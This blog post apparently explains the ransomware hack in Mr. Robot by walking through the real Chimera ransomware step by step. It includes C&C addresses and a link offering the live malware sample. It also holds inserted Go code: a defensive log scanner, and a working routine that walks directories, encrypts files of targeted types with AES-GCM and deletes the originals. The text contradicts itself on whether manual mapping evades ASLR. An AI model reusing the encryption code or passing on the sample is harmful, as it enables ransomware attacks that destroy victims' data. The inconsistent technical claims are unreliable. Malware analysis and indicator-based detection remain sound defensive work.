Welcome back, my greenhorn hackers!
As expected, the much anticipated return of Mr. Robot did not disappoint!
For those of you who are new to Mr. Robot, Elliot Alderson is an asocial IT security engineer who teams up with a group of hackers (f/society) determined to use their hacking skills to make a better world. Last season they were able to seriously damage the data of the world's largest holder of consumer and student debt, Evil Corp. Elliot, played brilliantly by Rami Malek, suffers from delusions involving his late father, played by Christian Slater. As season two begins, Elliot is trying to "recover" and get a grip on his delusions while staying with his mother, while the world financial system is reeling from a global financial crisis brought on by the f/society hack of Evil Corp.
In this series of articles, rather than recount the story details of this brilliant TV series, I will attempt to show how each of the realistic hacks in the show is done. We had two major hacks in this first episode: the ransomware against Evil Corp and the SmartHome hack of Evil Corp's General Counsel.
In this first episode of season 2, f/society was able to infect Evil Corp's data with ransomware. Ransomware is a type of malware that has become very popular in recent years. After infecting the victim's computer, it encrypts their data, making it unusable. The victim can recover their data only by paying a ransom for the key that decrypts it. Generally the ransoms are relatively small, usually in the $300-500 range, but there have been cases where hospitals and other large institutions have paid $20,000 or more.
Let's take a look at an example of some actual ransomware captured in the wild to better understand how it works. Although there is no way to know for certain what ransomware f/society used, all ransomware tends to function similarly. To understand how the f/society ransomware works, let's look at Chimera, a ransomware variant found in Germany.
Using Chimera as an Example
Most ransomware has been used against consumers, but Chimera, like the f/society ransomware, has been used to attack businesses in Germany. Since most ransomware works similarly, let's use it as a model for how f/society encrypted Evil Corp's data and held it to ransom for $5.9 million!
In this analysis, I will summarize how Chimera works, leaving out some steps for the sake of brevity. If you would like a copy of Chimera to conduct your own thorough analysis, I have posted it in my Pastebin account here.
Step 1: Delivering the Malware
Like much of the ransomware that has appeared in recent years, Chimera was delivered by email, likely with a social engineering component to get someone to click on a link or open a file (in this episode, Darlene uses the Social-Engineer Toolkit (SET) in Kali to load the ransomware onto a flash drive). Chimera was written in .NET.
In this first stage, what actually lands on the victim is only an executable stub, whose sole job is to fetch, decrypt, and decode the second-stage payload. Keeping the real payload encrypted until it is in memory means the file that arrives by email looks nothing like the ransomware itself.
Step 2: The AES Algorithm
The second stage is the encrypted and encoded payload, which contains a method that is clearly an AES encryption routine. f/society would very likely run it in multiple threads to speed up the process: Evil Corp has petabytes of data, and encrypting all of it would take some time.
Step 3: Mapping to Memory
In the next stage, Chimera manually maps its payload into memory, meaning it parses the PE image and resolves its imports and relocations itself instead of handing the file to the Windows loader. Note that this is not a way around ASLR or DEP: those are exploit mitigations (ASLR randomizes where modules, stacks and heaps land so an attacker cannot predict addresses for a buffer overflow; DEP marks data pages non-executable), and they are aimed at an attacker hijacking a process they do not control, whereas Chimera is already running its own code. What manual mapping buys the malware is stealth: a manually mapped image is not registered in the process's loaded-module list and never passes through the loader APIs that security products commonly hook, so it is more likely to run unnoticed and as expected.
Step 4: Find 32-Bit Process to Host
Next, Chimera enumerates every running Windows process looking for a 32-bit process that can host its payload, then opens a handle to it so the payload can be injected.
Step 5: Finding the Public IP
Next, the ransomware finds the public IP of the machine it has infected by querying www.whatismyipaddress.com, and stores that value in a variable. For defenders, that lookup is a useful network indicator: an internal workstation or server asking a what-is-my-IP service for its own address is unusual traffic on most business networks.
Step 6: Call Back to Command & Control Servers
Once Chimera has the IP of the infected host, it then calls out to its command and control (C&C) servers. In this case, those servers are at 220.127.116.11 and 18.104.22.168.
Chimera uses Bitmessage to communicate via a P2P protocol on ports 8444 and 8080. Bitmessage is a secure, encrypted P2P messaging system that enables a single person to send out messages to one or many recipients. You can see in the screenshot below that Chimera calls the Bitmessage client PyBitmessage.
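Steps 5 and 6 give a defender two concrete things to look for on the wire: a host asking www.whatismyipaddress.com for its own address, followed shortly by a connection to the C&C addresses or to the Bitmessage ports. The following is an added example, not code from the original article or from Chimera, that runs that logic over a few constructed egress log lines in a simplified "timestamp src dst dport host" format (the log format, the timestamps and the internal addresses are all assumptions made for the demo). A bare hit on port 8080 is deliberately not reported unless the same source already performed the public-IP lookup, since 8080 is common proxy traffic.

```go
package main

import (
	"fmt"
	"strings"
)

// Indicators from the Chimera behaviour described above.
const ipLookupHost = "www.whatismyipaddress.com"

var c2Addrs = map[string]bool{"220.127.116.11": true, "18.104.22.168": true}
var bitmessagePorts = map[string]bool{"8444": true, "8080": true}

// Constructed sample egress log, one connection per line:
// "<timestamp> <src> <dst> <dport> <http-host-or-dash>". Not a real capture.
const sampleLog = `2016-07-14T10:02:11Z 10.0.0.5 93.184.216.34 80 www.whatismyipaddress.com
2016-07-14T10:02:13Z 10.0.0.5 220.127.116.11 8444 -
2016-07-14T10:03:40Z 10.0.0.7 10.0.0.9 8080 intranet.example
2016-07-14T10:04:02Z 10.0.0.7 18.104.22.168 8080 -
2016-07-14T10:05:55Z 10.0.0.5 203.0.113.9 8444 -`

// Finding is one suspicious connection together with the reason it was flagged.
type Finding struct {
	Src, Dst, Port, Reason string
}

// ScanLog walks the log in order and returns findings in the order they occur.
// A known C&C address is always reported; a Bitmessage port is only reported
// once the same source has already looked up its own public IP (Step 5).
func ScanLog(log string) []Finding {
	lookedUp := map[string]bool{} // sources that have queried the IP-lookup site
	var findings []Finding
	for _, line := range strings.Split(log, "\n") {
		f := strings.Fields(line)
		if len(f) != 5 {
			continue // blank or malformed line
		}
		src, dst, port, host := f[1], f[2], f[3], f[4]
		switch {
		case strings.EqualFold(host, ipLookupHost):
			lookedUp[src] = true
		case c2Addrs[dst]:
			findings = append(findings, Finding{Src: src, Dst: dst, Port: port, Reason: "known Chimera C&C address"})
		case bitmessagePorts[port] && lookedUp[src]:
			findings = append(findings, Finding{Src: src, Dst: dst, Port: port, Reason: "Bitmessage port after public-IP lookup"})
		}
	}
	return findings
}

func main() {
	for _, f := range ScanLog(sampleLog) {
		fmt.Printf("%s -> %s:%s  %s\n", f.Src, f.Dst, f.Port, f.Reason)
	}
}
```

Against the sample log this reports three connections: both contacts with the listed C&C addresses, and 10.0.0.5 reaching an unknown host on 8444 after its what-is-my-IP lookup. The internal 8080 connection from 10.0.0.7 is left alone because that host never did the lookup.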
Step 7: Browse & Find Hard Drives, Then Files
Next, the malware must find the drives where the data is stored. It browses each of the logical drives and stores these locations in a variable for later use in the encryption process.
Step 8: Get Random Key
Now that this ransomware has successfully taken over a 32-bit process, mapped itself to memory to avoid ASLR, and enumerated the hard drives, it needs to call back to its command and control server to get a random key with which to encrypt the files.
Once the random key has been obtained from the command and control server, Chimera calls the function from Step 2 above, the AES encryption routine, and begins to encrypt critical files. Because the key arrives from the attacker's server rather than being generated and stored locally, there is nothing on the victim's disk to recover it from.
Before it starts the encryption, it looks for the following file types:
.jpg, .jpeg, .xml, .xsl, .wps, .cmf, .vbs, .accdb, .ini, .cdr, .svg, .conf, .config, .wb2, .msg, .azw, .azw1, .azw3, .azw4, .lit, .apnx, .mobi, .p12, .p7b, .p7c, .pfx, .pem, .cer, .key, .der, .mdb, .htm, .html, .class, .java, .asp, .aspx, .cgi, .php, .jsp, .bak, .dat, .pst, .eml, .xps, .sqllite, .sql, .jar, .wpd, .crt, .csv, .prf, .cnf, .indd, .number, .pages, .x3f, .srw, .pef, .raf, .rf, .nrw, .nef, .mrw, .mef, .kdc, .dcr, .crw, .eip, .fff, .iiq, .k25, .crwl, .bay, .sr2, .ari, .srf, .arw, .cr2, .raw, .rwl, .rw2, .r3d, .3fr, .eps, .pdd, .dng, .dxf, .dwg, .psd, .png, .jpe, .bmp, .gif, .tiff, .gfx, .jge, .tga, .jfif, .emf, .3dm, .3ds, .max, .obj, .a2c, .dds, .pspimage, .yuv, .3g2, .3gp, .asf, .asx, .mpg, .mpeg, .avi, .mov, .flv, .wma, .wmv, .ogg, .swf, .ptx, .ape, .aif, .av, .ram, .m3u, .movie, .mp1, .mp2, .mp3, .mp4, .mp4v, .mpa, .mpe, .mpv2, .rpf, .vlc, .m4a, .aac, .aa3, .amr, .mkv, .dvd, .mts, .vob, .3ga, .m4v, .srt, .aepx, .camproj, .dash, .zip, .rar, .gzip, .mdk, .mdf, .iso, .bin, .cue, .dbf, .erf, .dmg, .toast, .vcd, .ccd, .disc, .nrg, .nri, .cdi
These file types are likely critical to the business operation: graphics files, spreadsheet and database files, backup files, email files, source code, audio and video files, disc images, and, notably, private keys and certificates (.p12, .pfx, .pem, .key, .cer). Without them, the business is crippled. Just as telling is what is not on the list: executables and system files are left alone so the machine keeps running well enough for the victim to see the demand and pay.
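Steps 2, 7 and 8 together are the core of any ransomware: walk the drives, pick files by extension, and encrypt each one with a key the victim never gets to keep. The following is an added example, not code from the original article or from Chimera, that does exactly that over a directory tree in Go, using AES-GCM from the standard library so that decryption with the wrong key fails cleanly instead of producing garbage. The `.crypt` suffix, the short extension subset and the demo directory are assumptions; the real Chimera list is the one printed above, and its key comes from the C&C server rather than being generated locally as the demo does. The decryptor is included because it is the half a responder needs to understand: with the key, recovery is one call per file; without it, the GCM tag check guarantees nothing useful comes back.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
	"io"
	"io/fs"
	"os"
	"path/filepath"
	"strings"
)

// EncExt is an assumed suffix for encrypted files; the write-up does not say what Chimera uses.
const EncExt = ".crypt"

// targetExts is a short subset of the extension list above.
var targetExts = map[string]bool{
	".jpg": true, ".xml": true, ".sql": true, ".mdb": true, ".bak": true,
	".csv": true, ".pem": true, ".key": true, ".pfx": true, ".zip": true,
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key) // 16, 24 or 32 bytes selects AES-128/192/256
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// EncryptFile writes nonce||AES-GCM(plaintext) to path+EncExt and deletes the original.
// The key never touches the victim's disk, which is what makes recovery depend on the attacker.
func EncryptFile(key []byte, path string) error {
	plain, err := os.ReadFile(path)
	if err != nil {
		return err
	}
	gcm, err := newGCM(key)
	if err != nil {
		return err
	}
	nonce := make([]byte, gcm.NonceSize()) // fresh per file, so one key can cover many files
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return err
	}
	if err := os.WriteFile(path+EncExt, gcm.Seal(nonce, nonce, plain, nil), 0o600); err != nil {
		return err
	}
	return os.Remove(path)
}

// DecryptFile is the victim's recovery step; GCM's authentication tag makes a wrong key fail cleanly.
func DecryptFile(key []byte, path string) error {
	data, err := os.ReadFile(path)
	if err != nil {
		return err
	}
	gcm, err := newGCM(key)
	if err != nil {
		return err
	}
	ns := gcm.NonceSize()
	if len(data) < ns {
		return io.ErrUnexpectedEOF
	}
	plain, err := gcm.Open(nil, data[:ns], data[ns:], nil)
	if err != nil {
		return err // wrong key or tampered ciphertext
	}
	if err := os.WriteFile(strings.TrimSuffix(path, EncExt), plain, 0o600); err != nil {
		return err
	}
	return os.Remove(path)
}

// EncryptTree walks root (Step 7) and encrypts every regular file whose
// extension is in targetExts (Step 8), returning the paths it replaced.
func EncryptTree(key []byte, root string) ([]string, error) {
	var done []string
	err := filepath.WalkDir(root, func(p string, d fs.DirEntry, err error) error {
		if err != nil || d.IsDir() || !targetExts[strings.ToLower(filepath.Ext(p))] {
			return err
		}
		if err := EncryptFile(key, p); err != nil {
			return err
		}
		done = append(done, p)
		return nil
	})
	return done, err
}

func main() {
	dir, _ := os.MkdirTemp("", "chimera-demo") // throwaway demo directory
	defer os.RemoveAll(dir)
	key := make([]byte, 32)
	io.ReadFull(rand.Reader, key) // demo key; in Chimera this arrives from C&C (Step 8)
	os.WriteFile(filepath.Join(dir, "customers.csv"), []byte("id,name\n1,alice\n"), 0o600)
	done, err := EncryptTree(key, dir)
	fmt.Println("encrypted:", done, err)
	fmt.Println("restored:", DecryptFile(key, done[0]+EncExt))
}
```

Two details matter when reading real samples against this skeleton: the nonce is fresh per file (reusing one under the same key would let an analyst recover plaintext XOR relationships across files), and the original is removed only after the encrypted copy is fully written, which is why a ransomware run interrupted mid-tree leaves a mix of intact and encrypted files rather than truncated ones.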
Step 9: Ransom Request
Finally, Chimera presents its ransom demand to the business owner. Note that the browser and its associated files are exempt from the encryption so that the victim can still open the ransom page and make the payment.
I hope this helps you to understand how f/society was able to ransom Evil Corp for $5.9 million. I will attempt to demonstrate each and every hack from season 2, so keep coming back to Hackers-Arise, my greenhorn hackers!